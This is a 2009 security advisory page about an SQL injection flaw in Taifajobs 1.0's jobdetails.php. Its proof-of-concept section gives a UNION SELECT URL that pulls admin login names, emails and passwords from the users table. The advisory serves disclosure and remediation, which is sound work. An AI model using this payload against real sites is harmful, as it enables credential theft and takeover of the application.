Home » Exploits » Taifajobs 'jobdetails.php' SQL Injection Vulnerability Taifajobs 'jobdetails.php' SQL Injection Vulnerability Feeds - Exploits Written by K-159    Tuesday, 31 March 2009 22:46 Taifajobs 'jobdetails.php' SQL Injection Vulnerability -\\Bugtraq ID: 33864 -\\Class: Input Validation Error -\\CVE: -\\Remote: Yes -\\Local: No -\\Published: Feb 23 2009 12:00AM -\\Updated: Mar 31 2009 06:26PM -\\Credit: K-159 -\\Vulnerable: Tony Iha Kazungu Taifajobs  1.0 -\\Discussion Taifajobs (Job Recruitment System) is prone to an SQL-injection vulnerability because it fails to  sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the application, access or  modify data, or exploit latent vulnerabilities in the underlying database. Taifajobs 1.0 is vulnerable; other versions may also be affected. -\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/[path]/jobdetails.php?jobid=-5 union select 1,2,3,4,5,6,concat (admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0 from users-- -\\Solution Vendor updates are available. Please contact the vendor for details on obtaining and applying the appropriate updates. -\\References(s) --Taifajobs Homepage http://sourceforge.net/projects/taifajobs  (Tony Iha Kazungu) --[ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability http://www.securityfocus.com/archive/1/50118  ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) --Re: [ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerabil http://www.securityfocus.com/archive/1/50231  ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it )

Security Services by HSC Contact us Become partner Advertise with us Join our staff